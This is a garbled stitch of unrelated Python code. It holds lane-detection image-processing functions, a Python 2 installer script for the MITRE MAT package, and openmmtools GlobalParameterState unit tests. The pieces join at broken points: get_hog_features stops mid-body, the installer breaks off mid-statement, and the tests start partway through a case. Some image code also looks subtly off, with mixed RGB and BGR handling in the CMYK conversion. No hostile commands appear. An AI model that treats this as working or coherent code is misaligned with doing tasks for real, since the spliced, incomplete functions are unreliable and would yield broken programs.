horizontalMaskOffsetatBottomRight = configuration.ClipOffsetXBottomRight
#Offset mask horizontally from top left of image
horizontalMaskOffsetatTopLeft = configuration.ClipOffsetXTopLeft
#Offset mask horizontally from top right of image
horizontalMaskOffsetatTopRight = configuration.ClipOffsetXTopRight
#Offset mask from top left of image
VerticalMaskOffsetatTop = configuration.ClipOffsetYTop
#Offset mask from top right of image
VerticalMaskOffsetatBottom = configuration.ClipOffsetYBottom
#print("[From Clipper] Clipping: Bottom Left X: %f"%(horizontalMaskOffsetatBottomLeft))
vertices = np.array([
[
#Bottom left vertex
(horizontalMaskOffsetatBottomLeft*widthOfImage, heightOfImage-(VerticalMaskOffsetatBottom*heightOfImage)),
#Top left vertex
(horizontalMaskOffsetatTopLeft*widthOfImage, (VerticalMaskOffsetatTop*heightOfImage)),
#Top Right vertex
(widthOfImage - horizontalMaskOffsetatTopRight*widthOfImage, (VerticalMaskOffsetatTop*heightOfImage)),
#Bottom right vertex
(widthOfImage - horizontalMaskOffsetatBottomRight*widthOfImage, heightOfImage-(VerticalMaskOffsetatBottom*heightOfImage))
]
], dtype=np.int32)
clippedImage = region_of_interest(img, vertices)
return originalImage, clippedImage
def normalizeImages(img, channels, globalNormalization):
# Change individual channel strengths without distorting the information in the image
normalizedImage = np.copy(img)
for channel in channels:
#Local normalization
ChannelMean = np.mean(np.asarray(img[:,:,channel]).astype(float), axis=(0,1), keepdims=True)
ChannelStd = np.std(np.asarray(img[:,:,channel]).astype(float), axis=(0,1), keepdims=True)
#ChannelNormalized = (np.asarray(img[:,:,channel]).astype(float) - ChannelMean) / float(ChannelStd)
ChannelNormalized = (np.asarray(img[:,:,channel]).astype(float) - 0.*ChannelMean) / float(ChannelStd)
normalizedImage = np.copy(img.astype(np.uint8))
normalizedImage[:,:,channel] = (ChannelNormalized.astype(np.uint8))
if(globalNormalization):
globalMean = np.mean(np.asarray(normalizedImage).astype(float), axis=(0,1,2), keepdims=True)
globalStd = np.std(np.asarray(normalizedImage).astype(float), axis=(0,1, 2), keepdims=True)
normalizedImage = (normalizedImage- 0.*globalMean) / float(globalStd)
return np.asarray(normalizedImage.astype(np.uint8))
def changeColorSpace(targetColorSpace, img):
# Convert the image to the requested color space
if targetColorSpace != 'RGB':
if targetColorSpace == 'YUV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)
elif targetColorSpace == 'HSV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
elif targetColorSpace == 'LUV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)
elif targetColorSpace == 'HLS':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
elif targetColorSpace == 'YCrCb':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)
elif targetColorSpace == 'CYMK':
imageWithTargetColorSpace = []
imageWithTargetColorSpace = np.copy(img)
imageWithTargetColorSpace[:,:,0] = 0*imageWithTargetColorSpace[:,:,0]
imageWithTargetColorSpace[:,:,1] = 0*imageWithTargetColorSpace[:,:,1]
imageWithTargetColorSpace[:,:,2] = 0*imageWithTargetColorSpace[:,:,2]
imageWithTargetColorSpace = np.dstack((imageWithTargetColorSpace,0*imageWithTargetColorSpace[:,:,0]))
#http://stackoverflow.com/questions/14088375/how-can-i-convert-rgb-to-cmyk-and-vice-versa-in-python
cmyk_scale = 100
#CV arranges channels in B-G-R order
r = img[:, :, 0]
g = img[:, :, 1]
b = img[:, :, 2]
if (np.all(r==0)) and (np.all(g==0)) and (np.all(b==0)):
# black image: M = Y = 0, K = full scale; keep the image return contract
imageWithTargetColorSpace[:,:,3] = cmyk_scale
return imageWithTargetColorSpace[:, :, 1:4]
# rgb [0,255] -> cmy [0,1]
c = 1 - r / 255.
m = 1 - g / 255.
y = 1 - b / 255.
# extract out k [0,1]
# np.minimum is binary (a third argument is treated as an output array), so chain it
min_cmy = 0.01 + np.minimum(np.minimum(c, m), y)
c = (c - min_cmy) / (1 - min_cmy)
m = (m - min_cmy) / (1 - min_cmy)
y = (y - min_cmy) / (1 - min_cmy)
k = min_cmy
# rescale to the range [0,cmyk_scale]
imageWithTargetColorSpace[:,:,0] = c*cmyk_scale
imageWithTargetColorSpace[:,:,1] = m*cmyk_scale
imageWithTargetColorSpace[:,:,2] = y*cmyk_scale
imageWithTargetColorSpace[:,:,3] = k*cmyk_scale
#return c*cmyk_scale, m*cmyk_scale, y*cmyk_scale, k*cmyk_scale
#Drop C channel, as we are operating only with 3 channels
imageWithTargetColorSpace = imageWithTargetColorSpace[:, :, 1:4]
elif targetColorSpace == 'Gray':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
#Go from 1 channel to 3 channels
imageWithTargetColorSpace = cv2.cvtColor(imageWithTargetColorSpace, cv2.COLOR_GRAY2RGB)
else:
imageWithTargetColorSpace = np.copy(img)
return imageWithTargetColorSpace
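The RGB-to-CMYK arithmetic embedded in the CYMK branch is clearer on a single pixel. A scalar version of the textbook formula (without the small epsilon offset the image code adds to sidestep division by zero):

```python
def rgb_to_cmyk(r, g, b, scale=100):
    # rgb in [0, 255] -> cmy in [0, 1]
    c, m, y = 1 - r / 255., 1 - g / 255., 1 - b / 255.
    k = min(c, m, y)
    if k == 1:
        return 0, 0, 0, scale  # pure black: only the key channel
    # Remove the shared gray component and rescale
    c, m, y = ((v - k) / (1 - k) for v in (c, m, y))
    return c * scale, m * scale, y * scale, k * scale
```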
def isolatePixelsPerChannel(img, pixelRanges):
pixelRangesPerChannel = []
for channel in range(2, -1, -1):
pixelRangesPerChannel.append([pixelRanges[channel*2+1], pixelRanges[channel*2+0]])
imageWithIsolatedPixels = np.zeros_like(img)
channel0 = imageWithIsolatedPixels[:, :, 0]
channel1 = imageWithIsolatedPixels[:, :, 1]
channel2 = imageWithIsolatedPixels[:, :, 2]
channel0= (img[:, :, 0]>=pixelRangesPerChannel[0][0]) & (img[:, :, 0]<=pixelRangesPerChannel[0][1])
channel1= (img[:, :, 1]>=pixelRangesPerChannel[1][0]) & (img[:, :, 1]<=pixelRangesPerChannel[1][1])
channel2= (img[:, :, 2]>=pixelRangesPerChannel[2][0]) & (img[:, :, 2]<=pixelRangesPerChannel[2][1])
imageWithIsolatedPixels[:, :, 0] = (channel0*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 1] = (channel1*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 2] = (channel2*255).astype(np.uint8)
return imageWithIsolatedPixels
def customIsolatePixel(img, pixelRanges):
imageWithIsolatedPixels = np.zeros_like(img)
#For channel 0
localImage_channel0 = img[:, :, 0]
localImage_channel1 = img[:, :, 1]
localImage_channel2 = img[:, :, 2]
meanValue_channel0 = np.mean(localImage_channel0)
meanValue_channel1 = np.mean(localImage_channel1)
meanValue_channel2 = np.mean(localImage_channel2)
#channel0 = (localImage_channel0[:, :, 0]< 0.25* meanValue_channel0)
#channel1 = (localImage_channel0[:, :, 1]< 0.25* meanValue_channel1)
#channel2 = (localImage_channel0[:, :, 2]< 0.25* meanValue_channel2)
channel0 = (img[:, :, 0]< 0.25* meanValue_channel0)
channel1 = (img[:, :, 1]< 0.25* meanValue_channel1)
channel2 = (img[:, :, 2]< 0.25* meanValue_channel2)
imageWithIsolatedPixels[:, :, 0] = (channel0*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 1] = (channel1*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 2] = (channel2*255).astype(np.uint8)
return imageWithIsolatedPixels
def draw_lines(img, lines, color=[255, 255, 0], thickness=3):
if(lines is not None):
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def hough_lines(img, threshold, min_line_len, max_line_gap, rho = 1, theta = np.pi/180):
#lines = []
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
draw_lines(line_img, lines)
return line_img, lines
def weighted_img(img, initial_img, α=0.8, β=1., λ=0.):
return cv2.addWeighted(initial_img, α, img, β, λ)
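weighted_img is a thin wrapper over cv2.addWeighted, which computes a saturated per-pixel blend. A pure-NumPy equivalent makes the arithmetic explicit (a sketch; cv2's rounding of halfway values may differ slightly):

```python
import numpy as np

def add_weighted(img, alpha, overlay, beta, gamma=0.0):
    # Per-pixel blend img*alpha + overlay*beta + gamma,
    # saturated back into the uint8 range [0, 255].
    blended = img.astype(float) * alpha + overlay.astype(float) * beta + gamma
    return np.clip(blended, 0, 255).astype(np.uint8)
```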
def doEdgeDetection(img, cannyLowThreshold, cannyHighThreshold, kernel_size, houghThreshold, min_line_length = 50, max_line_gap = 50):
blurredImage = cv2.GaussianBlur(img[:, :, 2], (kernel_size, kernel_size), 0)
Edges = cv2.Canny(blurredImage, cannyLowThreshold, cannyHighThreshold)
if(len(Edges)>0):
lines_CurrentWorkingImage, computedLines = hough_lines(Edges, houghThreshold, min_line_length, max_line_gap)
#replicate channel 2
channel2Image = np.zeros_like(img)
channel2Image[:, :, 0] = img[:, :, 2]
channel2Image[:, :, 1] = img[:, :, 2]
channel2Image[:, :, 2] = img[:, :, 2]
#This will add lines on channel 0
superPosedImageWithBrokenLines = weighted_img(lines_CurrentWorkingImage, channel2Image, α=0.8, β=1., λ=0.)
superPosedImageWithBrokenLines[:, :, 2] = superPosedImageWithBrokenLines[:, :, 0]
superPosedImageWithBrokenLines[:, :, 0] = channel2Image[:, :, 0]
superPosedImageWithBrokenLines[:, :, 1] = channel2Image[:, :, 1]
else:
return img
return superPosedImageWithBrokenLines
def dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):
# Apply the following steps to img
# 1) Convert to grayscale
#gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
gray = img[:, :, 2]
returnedImage = np.zeros_like(img)
# 2) Take the gradient in x and y separately
sobel_x = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
sobel_y = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
# 3) Take the absolute value of the x and y gradients
abs_sobel_x = np.absolute(sobel_x)
abs_sobel_y = np.absolute(sobel_y)
# 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient
dirGradients = np.arctan2(abs_sobel_y, abs_sobel_x)
#maxGradient = np.max(dirGradients)
# 5) Create a binary mask where direction thresholds are met
dirGradientsbinary = np.zeros_like(dirGradients)
dirGradientsbinary[(dirGradients >= thresh[0]) & (dirGradients <= thresh[1])] = 255
returnedImage[:, :, 0] = dirGradientsbinary
returnedImage[:, :, 1] = dirGradientsbinary
returnedImage[:, :, 2] = dirGradientsbinary
return returnedImage
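The direction masking in dir_threshold reduces to arctan2 of the absolute gradients. A NumPy-only sketch using np.gradient in place of cv2.Sobel (plain finite differences, so the magnitudes differ from Sobel's weighted kernel, but the direction logic is the same):

```python
import numpy as np

def direction_mask(gray, thresh=(0, np.pi / 2)):
    # np.gradient returns d/drow, d/dcol for a 2-D array
    gy, gx = np.gradient(gray.astype(float))
    direction = np.arctan2(np.abs(gy), np.abs(gx))
    return (direction >= thresh[0]) & (direction <= thresh[1])
```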
def get_hog_features(img, orient, pix_per_cell, cell_per_block, vis=False, feature_vec=True):
if vis == True:
# Copyright (C) 2007 - 2009 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
# This script does the real work of the installation. The first
# thing it needs to check is whether it was invoked with Python
# 2.6 or later. Notice that this is NOT an executable Python
# script; it must be called as "python install.py".
# During installation, it will be called from install.sh, but it
# shouldn't be required. So let's just be absolutely sure.
import sys, glob
if not hasattr(sys, "version_info"):
print >> sys.stderr, "Python 2.x required (2.6 or later)."
sys.exit(1)
majV, minV = sys.version_info[:2]
if majV != 2 or (minV < 6):
print >> sys.stderr, "Python 2.x required (2.6 or later)."
sys.exit(1)
if sys.platform == "cygwin":
print >> sys.stderr, "Cygwin is no longer supported, because Cygwin Python is distributed without sqlite bindings."
sys.exit(1)
# OK, we know we've got the right version of Python.
import os, re, shutil
# This file is intended to be installed at the root of the
# package.
MAT_BUNDLE_HOME = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, os.path.join(MAT_BUNDLE_HOME, "src", "MAT", "build"))
import MAT_distutils
#
# Utilities
#
def notify(s):
print "#\n# %s\n#\n" % s
from MAT_distutils import shellOutput, MATManifest, VersionExtractor, chooseExecutable
P_AS_FILE, P_AS_DIR = range(2)
def checkOnPlatform(path, plat, mode = P_AS_FILE):
if (mode is P_AS_FILE and not os.path.isfile(path)) or \
(mode is P_AS_DIR and not os.path.isdir(path)):
print "%s not found; your %s installation is incomplete." % (path, plat)
sys.exit(1)
else:
return path
# There are three different options worth considering here:
# sys.platform = win32
# other
#
# Toplevel
#
import getopt
def Usage():
print "Usage: install.py [ --no_terminator_prompt ]"
sys.exit(1)
opts, args = getopt.getopt(sys.argv[1:], "", ["no_terminator_prompt"])
if args:
Usage()
TERMINATOR_PROMPT = True
for k, v in opts:
if k == "--no_terminator_prompt":
TERMINATOR_PROMPT = False
else:
Usage()
# On MacOS X and Windows, we're going to use Terminator.
# Let's see if we can work that in. The idea is not to have to
# run X11 on either platform.
# Update: the tabbed terminal is now optional.
# Here are the settings we need.
# PYTHONBIN= sys.executable in Python
# TABBED_TERMINAL_BIN= <bundle>/build/mrxvt/bin/mrxvt on Unix
# JSON_PYTHONLIB= <bundle>/build/simplejson
# YUI_JS_LIB= <bundle>/src/<whatever the dir is in the manifest>
# CHERRYPY_PYTHONLIB = <bundle>/src/<cherrypydir>
# MUNKRES_PYTHONLIB = <bundle>src/<munkresdir>
# In this table, we have the settings which are make-or-break; if
# the specified file isn't in the specified location, something is
# very, very wrong.
KNOWN_PLATFORMS = {"Solaris": {},
"Linux": {},
"MacOS X Tiger": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make"},
"MacOS X Leopard": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make",
"JAVA_HOME_CANDIDATES": glob.glob("/System/Library/Frameworks/JavaVM.framework/Versions/*/Home/bin")},
"MacOS X Snow Leopard": {"GCC": "/usr/bin/gcc",
"GNU_MAKE": "/usr/bin/make"},
'Windows': {'GCC': None,
'GNU_MAKE': None,
"JAVA_HOME_CANDIDATES":
glob.glob("c:/Program Files/Java/*/bin") + glob.glob("c:/Program Files (x86)/Java/*/bin")
}
}
THIS_PLATFORM = None
COMPILE_SIMPLEJSON = True
if sys.platform == "win32":
THIS_PLATFORM = "Windows"
elif sys.platform == "linux2":
THIS_PLATFORM = "Linux"
elif sys.platform == "sunos5":
THIS_PLATFORM = "Solaris"
elif sys.platform == "darwin":
# Gotta check uname. That's the only way, apparently.
e = VersionExtractor("(?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?",
"%s -r", ("major", "minor", "subminor"))
version = e.extractVersion("uname")
if e.atLeastVersion((9,), version):
if e.atLeastVersion((10,), version):
THIS_PLATFORM = "MacOS X Snow Leopard"
if minV < 6:
# Because 10.4 build support is what simplejson wants, and
# it's not available by default in Python 2.6, we can't try to compile
# simplejson - just copy it.
COMPILE_SIMPLEJSON = False
else:
THIS_PLATFORM = "MacOS X Leopard"
else:
# Not really, but close enough for the moment.
THIS_PLATFORM = "MacOS X Tiger"
else:
print "This platform is not supported."
sys.exit(1)
notify("Reading manifest...")
manifestDir = MATManifest(MAT_BUNDLE_HOME)
manifestDir.load()
# Let's use a dictionary.
# Gotta find the dependency jar.
Settings = {
"PYTHONBIN": sys.executable,
"YUI_JS_LIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["yui_dir"]),
"CHERRYPY_PYTHONLIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["cherrypy"]),
"MUNKRES_PYTHONLIB": os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["munkres"]),
"JCARAFE_JAR": glob.glob(os.path.join(MAT_BUNDLE_HOME, "src", manifestDir["jcarafe"], "*-bin.jar"))[0]
}
UnsavedSettings = []
# We already know we have Python.
# First thing: check for Java 1.6 or later. We want to find the
# latest version that satisfies the criteria.
notify("Checking for Java...")
javaBin = chooseExecutable("Java, version 1.6.0_04 or later",
execName = "java",
execExtraDirs = KNOWN_PLATFORMS[THIS_PLATFORM].get("JAVA_HOME_CANDIDATES"),
versionChecker = ('java version "(?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+)(_(?P<subsubminor>[0-9]+))?)?)?"', '"%s" -version 2>&1', ("major", "minor", "subminor", "subsubminor"), (1, 6, 0, 4), None),
failureString = "is not a recent enough version of Java.",
execFailureString = "No appropriate version of Java found. Exiting.",
exitOnFailure = True)
Settings["JAVA_BIN"] = javaBin
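The versionChecker tuple passed to chooseExecutable drives a regex-parse-then-tuple-compare routine inside MAT_distutils. A standalone sketch of that pattern (simplified, and not the MAT_distutils implementation):

```python
import re

VERSION_RE = re.compile(
    r'java version "(?P<major>\d+)(\.(?P<minor>\d+)'
    r'(\.(?P<subminor>\d+)(_(?P<sub2>\d+))?)?)?"')

def java_version_ok(banner, minimum=(1, 6, 0, 4)):
    # Parse the banner printed by `java -version` and compare as tuples,
    # treating missing components as zero.
    m = VERSION_RE.search(banner)
    if not m:
        return False
    parts = tuple(int(m.group(g) or 0)
                  for g in ("major", "minor", "subminor", "sub2"))
    return parts >= minimum
```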
# Tabbed terminal.
TERMINATOR_FOUND_PROMPT = """The Terminator tabbed terminal application is
not installed in its expected location at /Applications/Terminator.app.
This application is not required for this package to run, but can be a convenient
tool when used via src/MAT/bin/MATWeb.
You may have Terminator installed somewhere else, or you may not have
installed it yet. If you have not installed Terminator, you can find an
installation bundle in for it in the 'external' subdirectory of this package;
please install it and then return to this installation.
"""
TERMINATOR_NOTFOUND_PROMPT = """The Terminator tabbed terminal application is
not installed in its expected location at /Applications/Terminator.app.
This application is not required for this package to run, but can be a convenient
tool when used via src/MAT/bin/MATWeb. No installation package for
Terminator has been provided with this distribution.
"""
# Tabbed terminal is not required, and may not be in the tarball.
USE_MRXVT = False
if THIS_PLATFORM in ['Linux', 'Solaris']:
if manifestDir.has_key('mrxvt'):
if re.search("\s", MAT_BUNDLE_HOME):
# mrxvt will not build when there's a space in the path.
print "Warning: skipping build of mrxvt tabbed terminal because the MAT install path"
print "contains whitespace. If you want to use mrxvt, unpack the MAT tarball"
print "in a directory path which has no whitespace in it."
else:
Settings["TABBED_TERMINAL_BIN"] = os.path.join(MAT_BUNDLE_HOME, "build", "mrxvt", "bin", "mrxvt")
USE_MRXVT = True
elif THIS_PLATFORM in ['MacOS X Tiger', 'MacOS X Leopard', "MacOS X Snow Leopard"]:
# Terminator supposedly works on Windows and MacOS X. We've
# been working with the developers to fix some bugs in it.
appBin = "/Applications/Terminator.app"
if not manifestDir.has_key("terminator"):
tPrompt = TERMINATOR_NOTFOUND_PROMPT
else:
tPrompt = TERMINATOR_FOUND_PROMPT
def terminatorFilterFn(v):
return os.path.isdir(v) and os.path.isfile(os.path.join(v, "Contents/MacOS/Terminator"))
appBin = chooseExecutable("Terminator", execCandidates = ["/Applications/Terminator.app",
"/Applications/Terminator/Terminator.app"],
filterFn = lambda v: os.path.isdir(v),
failureString = "is not a Mac application.",
promptIntro = tPrompt,
execPrompt = "Please provide the path to the Terminator application, or hit <return> to skip: ")
if appBin:
Settings["TABBED_TERMINAL_BIN"] = os.path.join(appBin, "Contents/MacOS/Terminator")
else:
print "No path to the Terminator application specified. Skipping."
elif THIS_PLATFORM in ['Windows']:
if manifestDir.has_key('console'):
Settings['TABBED_TERMINAL_BIN'] = os.path.join(MAT_BUNDLE_HOME, "external", manifestDir['console'], "Console2", "Console.exe")
# Check gcc, GNU make. I want GCC for simplejson, for which it's not strictly necessary.
# I want GCC and GNU_MAKE for mrxvt, but if it's missing, I'll just skip mrxvt. And
# some of the plugins may want them too. So don't exit on failure.
if THIS_PLATFORM != "Windows":
notify("Checking for GNU make...")
if THIS_PLATFORM in ["MacOS X Tiger", "MacOS X Leopard",
"MacOS X Snow Leopard"]:
GNU_MAKE = chooseExecutable("GNU make",
execCandidates = [KNOWN_PLATFORMS[THIS_PLATFORM]["GNU_MAKE"]],
execFailureString = "No appropriate version of GNU make found. Some steps of your build may be skipped, or your build may fail.")
else:
GNU_MAKE = chooseExecutable("GNU make, version 3.79.1 or later",
execName = "make",
versionChecker = ("GNU Make( version)? (?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?", "%s --version 2>/dev/null", ("major", "minor", "subminor"), (3, 79, 1), None),
failureString = "is not a recent enough version of GNU make.",
execFailureString = "No appropriate version of GNU make found. Some steps of your build may be skipped, or your build may fail.")
UnsavedSettings.append(("GNU make", GNU_MAKE))
notify("Checking for gcc...")
if THIS_PLATFORM in ["MacOS X Tiger", "MacOS X Leopard",
"MacOS X Snow Leopard"]:
GCC = chooseExecutable("gcc",
execCandidates = [KNOWN_PLATFORMS[THIS_PLATFORM]["GCC"]],
execFailureString = "No appropriate version of gcc found. Some steps of your build may be skipped, or your build may fail.")
else:
GCC = chooseExecutable("gcc, version 3 or later",
execName = "gcc",
versionChecker = ("gcc version (?P<major>[0-9]+)(\.(?P<minor>[0-9]+)(\.(?P<subminor>[0-9]+))?)?", "%s -v 2>&1", ("major", "minor", "subminor"), (3,), None),
failureString = "is not a recent enough version of gcc.",
execFailureString = "No appropriate version of gcc found. Some steps of your build may be skipped, or your build may fail.")
UnsavedSettings.append(("GCC", GCC))
# Finally, let's see whether we should set up psutil.
if manifestDir.has_key("psutil"):
# This may very well fail, because there's no GCC.
# Don't enable it by default; just make it available.
Settings["PSUTIL_PYTHONLIB"] = os.path.join(MAT_BUNDLE_HOME, "build", "psutil", "lib", "python")
else:
GCC = GNU_MAKE = None
notify("Settings:")
padding = max(map(len, Settings.keys() + [x[0] for x in UnsavedSettings]))
for k, v in UnsavedSettings + Settings.items():
s
{'parameters_name_suffix': 'suffix'},
{'parameters_name_suffix': 'suffix', 'lambda_angles': 1.0},
{'parameters_name_suffix': 'suffix', 'lambda_sterics': 0.5, 'lambda_angles': 0.5}]
for test_kwargs in test_cases:
state = MyState(**test_kwargs)
# Check which parameters are defined/undefined in the constructed state.
for parameter in MyState._get_controlled_parameters():
# Store whether parameter is defined before appending the suffix.
is_defined = parameter in test_kwargs
# The "unsuffixed" parameter should not be controlled by the state.
if 'parameters_name_suffix' in test_kwargs:
with nose.tools.assert_raises_regexp(AttributeError, 'state does not control'):
getattr(state, parameter)
# The state exposes a "suffixed" version of the parameter.
state_attribute = parameter + '_' + test_kwargs['parameters_name_suffix']
else:
state_attribute = parameter
# Check that each parameter is defined or undefined (i.e. set to None) as expected.
err_msg = 'Parameter: {} (Test case: {})'.format(parameter, test_kwargs)
if is_defined:
assert getattr(state, state_attribute) == test_kwargs[parameter], err_msg
else:
assert getattr(state, state_attribute) is None, err_msg
def test_from_system_constructor(self):
"""Test GlobalParameterState.from_system constructor."""
# A system exposing no global parameters controlled by the state raises an error.
with nose.tools.assert_raises_regexp(GlobalParameterError, 'no global parameters'):
GlobalParameterState.from_system(openmm.System())
system = self.diatomic_molecule_ts.system
state = ParameterStateExample.from_system(system)
state_suffix = ParameterStateExample.from_system(system, parameters_name_suffix='mysuffix')
for parameter_name, parameter_value in self.parameters_default_values.items():
if 'suffix' in parameter_name:
controlling_state = state_suffix
noncontrolling_state = state
else:
controlling_state = state
noncontrolling_state = state_suffix
err_msg = '{}: {}'.format(parameter_name, parameter_value)
assert getattr(controlling_state, parameter_name) == parameter_value, err_msg
with nose.tools.assert_raises(AttributeError):
getattr(noncontrolling_state, parameter_name)
def test_parameter_validator(self):
"""Test GlobalParameterState constructor behave as expected."""
class MyState(GlobalParameterState):
lambda_bonds = GlobalParameterState.GlobalParameter('lambda_bonds', standard_value=1.0)
@lambda_bonds.validator
def lambda_bonds(self, instance, new_value):
if not (0.0 <= new_value <= 1.0):
raise ValueError('lambda_bonds must be between 0.0 and 1.0')
return new_value
# Create system with incorrect initial parameter.
system = self.diatomic_molecule_ts.system
system.getForce(0).setGlobalParameterDefaultValue(0, 2.0) # lambda_bonds
system.getForce(1).setGlobalParameterDefaultValue(0, -1.0) # lambda_bonds_mysuffix
for suffix in [None, 'mysuffix']:
# Raise an exception on init.
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
MyState(parameters_name_suffix=suffix, lambda_bonds=-1.0)
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
MyState.from_system(system, parameters_name_suffix=suffix)
# Raise an exception when properties are set.
state = MyState(parameters_name_suffix=suffix, lambda_bonds=1.0)
parameter_name = 'lambda_bonds' if suffix is None else 'lambda_bonds_' + suffix
with nose.tools.assert_raises_regexp(ValueError, 'must be between'):
setattr(state, parameter_name, 5.0)
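The pattern these tests exercise, a class-level parameter attribute with an attached validator, can be sketched in plain Python using the descriptor protocol. This is a simplified stand-in, not the openmmtools implementation, and the validator signature is reduced here:

```python
# Simplified sketch of a validated parameter descriptor (hypothetical,
# not the openmmtools implementation).
class GlobalParameter:
    def __init__(self, name, standard_value):
        self.name = name
        self.standard_value = standard_value
        self._validator = None

    def validator(self, func):
        # Decorator: register a validation function, then return the
        # descriptor so the class attribute still points at it.
        self._validator = func
        return self

    def __set_name__(self, owner, name):
        self._attr = '_' + name

    def __get__(self, instance, owner):
        if instance is None:
            return self
        return getattr(instance, self._attr, self.standard_value)

    def __set__(self, instance, value):
        if self._validator is not None:
            value = self._validator(instance, value)
        setattr(instance, self._attr, value)

class MyState:
    lambda_bonds = GlobalParameter('lambda_bonds', standard_value=1.0)

    @lambda_bonds.validator
    def lambda_bonds(self, new_value):
        if not 0.0 <= new_value <= 1.0:
            raise ValueError('lambda_bonds must be between 0.0 and 1.0')
        return new_value

state = MyState()
assert state.lambda_bonds == 1.0   # standard value until explicitly set
state.lambda_bonds = 0.5           # accepted by the validator
```

Assigning an out-of-range value (e.g. `state.lambda_bonds = 5.0`) raises `ValueError`, matching the behavior the tests above assert on both construction and property assignment.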
def test_equality_operator(self):
"""Test equality operator between GlobalParameterStates."""
state1 = ParameterStateExample(lambda_bonds=1.0)
state2 = ParameterStateExample(lambda_bonds=1.0)
state3 = ParameterStateExample(lambda_bonds=0.9)
state4 = ParameterStateExample(lambda_bonds=0.9, gamma=1.0)
state5 = ParameterStateExample(lambda_bonds=0.9, parameters_name_suffix='suffix')
state6 = ParameterStateExample(parameters_name_suffix='suffix', lambda_bonds=0.9, gamma=1.0)
assert state1 == state2
assert state2 != state3
assert state3 != state4
assert state3 != state5
assert state4 != state6
assert state5 != state6
assert state6 == state6
# States that control more variables are not equal.
class MyState(ParameterStateExample):
extra_parameter = GlobalParameterState.GlobalParameter('extra_parameter', standard_value=1.0)
state7 = MyState(lambda_bonds=0.9)
assert state3 != state7
# States defined by global parameter functions are evaluated correctly.
state8 = copy.deepcopy(state1)
state8.set_function_variable('lambda1', state1.lambda_bonds*2.0)
state8.lambda_bonds = GlobalParameterFunction('lambda1 / 2')
assert state1 == state8
state8.set_function_variable('lambda1', state1.lambda_bonds)
assert state1 != state8
def test_apply_to_system(self):
"""Test method GlobalParameterState.apply_to_system()."""
system = self.diatomic_molecule_ts.system
state = ParameterStateExample.from_system(system)
state_suffix = ParameterStateExample.from_system(system, parameters_name_suffix='mysuffix')
expected_system_values = copy.deepcopy(self.parameters_default_values)
def check_system_values():
state, state_suffix = self.read_system_state(system)
for parameter_name, parameter_value in expected_system_values.items():
err_msg = 'parameter: {}, expected_value: {}'.format(parameter_name, parameter_value)
if 'suffix' in parameter_name:
assert getattr(state_suffix, parameter_name) == parameter_value, err_msg
else:
assert getattr(state, parameter_name) == parameter_value, err_msg
# Test precondition: all parameters have the expected default value.
check_system_values()
# apply_to_system() modifies the state.
state.lambda_bonds /= 2
expected_system_values['lambda_bonds'] /= 2
state_suffix.lambda_bonds_mysuffix /= 2
expected_system_values['lambda_bonds_mysuffix'] /= 2
for s in [state, state_suffix]:
s.apply_to_system(system)
check_system_values()
# Raise an error if an extra parameter is defined in the system.
state.gamma = None
err_msg = 'The system parameter gamma is not defined in this state.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
state.apply_to_system(system)
# Raise an error if an extra parameter is defined in the state.
state_suffix.gamma_mysuffix = 2.0
err_msg = 'Could not find global parameter gamma_mysuffix in the system.'
with nose.tools.assert_raises_regexp(GlobalParameterError, err_msg):
state_suffix.apply_to_system(system)
def test_check_system_consistency(self):
"""Test method GlobalParameterState.check_system_consistency()."""
system = self.diatomic_molecule_ts.get_system(remove_thermostat=True)
def check_not_consistency(states):
for s in states:
with nose.tools.assert_raises_regexp(GlobalParameterError, 'Consistency check failed'):
s.check_system_consistency(system)
# A system is consistent with itself.
state, state_suffix = self.read_system_state(system)
for s in [state, state_suffix]:
s.check_system_consistency(system)
# Raise error if System defines global parameters that are undefined in the state.
state, state_suffix = self.read_system_state(system)
state.gamma = None
state_suffix.lambda_bonds_mysuffix = None
check_not_consistency([state, state_suffix])
# Raise error if state defines global parameters that are undefined in the System.
state, state_suffix = self.read_system_state(system)
state_suffix.gamma_mysuffix = 1.0
check_not_consistency([state_suffix])
# Raise error if system has different lambda values.
state, state_suffix = self.read_system_state(system)
state.lambda_bonds /= 2
state_suffix.lambda_bonds_mysuffix /= 2
check_not_consistency([state, state_suffix])
def test_apply_to_context(self):
"""Test method GlobalParameterState.apply_to_context."""
system = self.diatomic_molecule_ts.system
integrator = openmm.VerletIntegrator(1.0*unit.femtosecond)
context = create_default_context(self.diatomic_molecule_ts, integrator)
